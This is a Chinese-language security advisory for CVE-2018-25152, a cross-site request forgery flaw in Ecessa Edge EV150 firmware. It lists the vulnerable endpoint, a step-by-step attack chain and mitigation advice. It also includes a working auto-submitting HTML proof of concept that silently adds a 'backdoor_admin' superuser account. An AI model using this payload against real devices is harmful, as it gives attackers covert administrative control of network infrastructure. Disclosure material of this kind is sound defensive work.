IPBUF安全漏洞报告
English
CVE-2018-25152 CVSS 5.3 中危

CVE-2018-25152 Ecessa Edge EV150 跨站请求伪造漏洞

披露日期: 2025-12-24

漏洞信息

漏洞编号
CVE-2018-25152
漏洞类型
跨站请求伪造(CSRF)
CVSS评分
5.3 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
Ecessa Edge EV150

相关标签

跨站请求伪造CSRFEcessaEdge EV150网络设备未授权访问身份认证绕过CVE-2018-25152

漏洞概述

CVE-2018-25152是Ecessa Edge EV150设备中存在的跨站请求伪造(CSRF)漏洞。该漏洞影响固件版本10.7.4,允许未经身份验证的攻击者通过构造恶意网页,在目标用户不知情的情况下,向受影响设备提交恶意请求,从而创建具有完全管理员权限的超级用户账户。攻击者利用此漏洞可以完全控制受影响设备,获取网络基础设施的完全访问权限,执行任意配置更改,甚至可能将设备纳入僵尸网络用于进一步的攻击活动。由于该漏洞无需任何认证即可利用,且攻击复杂度较低,对使用Ecessa Edge EV150设备的组织构成严重安全风险。攻击者通常会诱骗设备管理员访问包含恶意表单的网页,当管理员浏览器自动向设备提交预先构造的请求时,即可在设备上创建新的管理员账户。

技术细节

该漏洞存在于Ecessa Edge EV150的Web管理界面中,具体涉及/cgi-bin/pl_web.cgi/util_configlogin_act端点。漏洞的根本原因在于该端点缺少有效的CSRF令牌验证机制,无法验证请求是否来自合法的用户会话。攻击者可以构造一个HTML页面,包含自动提交的表单,表单参数指定目标设备的IP地址、期望的用户名和密码。当设备管理员访问该恶意页面时,浏览器会自动向目标的/cgi-bin/pl_web.cgi/util_configlogin_act端点发送POST请求。由于浏览器的同源策略,Cookie会自动随请求发送,而目标设备无法区分该请求是来自管理界面的正常操作还是来自第三方网站的恶意请求。攻击者可以利用此漏洞创建任意权限级别的用户账户,包括具有完全控制权限的超级用户账户。成功利用后,攻击者获得设备的管理员访问权限,可以修改防火墙规则、VPN配置、网络路由等关键安全设置。

攻击链分析

STEP 1
步骤1: 侦察阶段
攻击者识别使用Ecessa Edge EV150设备的网络环境,确定目标设备的IP地址和管理界面可访问性
STEP 2
步骤2: 恶意页面制作
攻击者构造包含恶意表单的HTML页面,表单目标指向/cgi-bin/pl_web.cgi/util_configlogin_act端点,参数设置为期望的管理员凭据
STEP 3
步骤3: 社会工程攻击
攻击者通过钓鱼邮件、恶意链接或其他社会工程手段诱骗设备管理员访问恶意网页
STEP 4
步骤4: 请求自动提交
管理员浏览器加载恶意页面后,JavaScript自动提交表单,浏览器自动附带Cookie向目标设备发送POST请求
STEP 5
步骤5: 账户创建
目标设备收到请求后,由于缺少CSRF验证,直接执行账户创建操作,在设备上添加攻击者预设的超级用户账户
STEP 6
步骤6: 持久化访问
攻击者使用创建的账户登录设备管理界面,获取完全控制权限,可以修改配置、窃取数据或进行进一步的网络渗透

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
<!-- CSRF PoC for CVE-2018-25152 - Create Admin User --> <!DOCTYPE html> <html> <head> <title>Device Configuration</title> </head> <body> <h1>Device Configuration Loading...</h1> <form id="csrfForm" action="http://[TARGET_IP]/cgi-bin/pl_web.cgi/util_configlogin_act" method="POST"> <input type="hidden" name="username" value="backdoor_admin"> <input type="hidden" name="password" value="P@ssw0rd123!"> <input type="hidden" name="privilege" value="15"> <input type="hidden" name="enable" value="1"> <input type="hidden" name="action" value="add"> </form> <script> // Auto-submit the form without user interaction document.getElementById('csrfForm').submit(); </script> <p>If you see this message, the attack may have failed.</p> </body> </html>

影响范围

Ecessa Edge EV150 固件 10.7.4及之前版本

防御指南

临时缓解措施
在厂商发布修复固件之前,可采取以下临时缓解措施:1)将管理界面限制在可信网络段访问,避免从互联网直接访问;2)使用VPN连接访问管理界面;3)监控网络流量,关注异常的HTTP POST请求;4)定期检查设备账户列表,及时发现可疑账户;5)培训管理员识别钓鱼攻击和恶意链接;6)考虑使用网络防火墙规则限制对管理端口的访问来源。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表